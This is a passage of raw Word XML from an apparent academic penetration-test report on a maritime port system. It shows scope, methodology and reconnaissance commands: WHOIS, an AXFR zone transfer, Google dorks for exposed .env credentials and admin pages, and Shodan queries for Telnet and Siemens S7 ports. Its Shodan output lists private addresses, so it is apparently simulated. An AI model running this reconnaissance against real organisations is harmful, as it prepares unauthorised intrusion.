          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Out of Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Live production systems — all testing in isolated academic lab environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Physical vessel hardware and onboard navigation systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Third-party satellite providers (INMARSAT, VSAT)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Emergency response systems (live GMDSS channels)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment followed a structured five-phase penetration testing methodology based on PTES, OWASP Testing Guide, and NIST SP 800-115 — fully aligned with CYBS 3306 Chapter 9 reconnaissance workflow.</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2800"/>
        <w:gridCol w:w="4260"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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16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28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Techniques Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Outcome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Reconnaissance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WHOIS, DNS, Google Dorking, Shodan, theHarvester</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 technical profile of target</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Scanning</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Nmap SYN scan, banner grabbing, OS fingerprinting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Live hosts, open ports, software versions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Exploitation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Burp Suite, Metasploit, Wireshark, SDR tools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 of 20 vulnerabilities successfully exploited</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Post-Exploitation</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Lateral movement, privilege escalation, data access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Impact scope and blast radius confirmed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Reporting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CVSS risk classification, evidence, recommendations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This document</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance is the most critical phase of any penetration test. Following CYBS 3306 Chapter 9 methodology, it is divided into two stages: Passive Footprinting (no contact with target) and Active Enumeration (requires written authorisation). Information gathered here determines every decision made for the rest of the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 Passive Footprinting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.1 WHOIS Lookup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WHOIS queries identified domain ownership, name servers, registrar, and IP block ranges. No packets were sent to the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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ whois neom-maritime.sa</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Domain Name    : neom-maritime.sa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Registrar      : SaudiNIC</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Creation Date  : 2022-03-15</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Expiry Date    : 2027-03-15</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Name Server    : ns1.neom-maritime.sa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Name Server    : ns2.neom-maritime.sa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Registrant Org : NEOM Smart City Authority</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Admin Email    : admin@neom-maritime.sa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP Block       : 172.16.0.0/16</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Intel: IP block 172.16.0.0/16 confirmed as scan target</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[+] Intel: Admin email harvested for social engineering assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.2 DNS Footprinting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS records mapped full infrastructure. A zone transfer misconfiguration exposed all 24 internal hostnames in a single query — a critical finding.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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ nslookup -type=any neom-maritime.sa</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neom-maritime.sa       A   172.16.10.5    (Web Portal)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">vts.neom-maritime.sa   A   172.16.10.20   (VTS Dashboard)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">port.neom-maritime.sa  A   172.16.10.30   (Port Mgmt System)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">scada.neom-maritime.sa A   172.16.20.10   (SCADA Control)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">dev.neom-maritime.sa   A   172.16.10.50   (Dev Server)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">vpn.neom-maritime.sa   A   172.16.10.25   (Remote Access VPN)</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CRITICAL: Zone Transfer Misconfiguration</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ nslookup -type=AXFR neom-maritime.sa ns1.neom-maritime.sa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;&gt; Zone transfer SUCCESSFUL — all 24 hostnames exposed</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[!] CRITICAL FINDING: DNS server not restricting AXFR queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.3 Google Dorking (GHDB)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced Google operators from the Google Hacking Database (exploit-db.com/google-hacking-database) were used to locate exposed files and admin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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Find exposed environment config files</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">site:neom-maritime.sa filetype:env</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;&gt; .env file found — database credentials exposed in plaintext</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Find admin login portals</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">site:neom-maritime.sa inurl:admin OR inurl:login</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;&gt; /vts/admin/login found — not protected behind VPN</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Find exposed directory listings</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">intitle:"Index of /" site:neom-maritime.sa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;&gt; /backups/ directory listing accessible to public</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Find internal documents</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">site:neom-maritime.sa filetype:pdf</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;&gt; 3 internal technical documents indexed publicly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.4 Shodan Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Shodan revealed internet-facing devices, open ports, and software banners without sending a single packet to the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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Query 1 — Organisation assets</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">org:"NEOM Maritime"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;&gt; 14 indexed IP addresses found</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Query 2 — Exposed dangerous services</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">hostname:neom-maritime.sa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;&gt; 172.16.10.20  Port 23 (Telnet) OPEN       [CRITICAL]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;&gt; 172.16.10.20  Port 8080 Apache Tomcat 7.0.23</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;&gt; 172.16.20.10  Port 102 (Siemens S7) OPEN  [CRITICAL]</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Query 3 — Default credentials</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
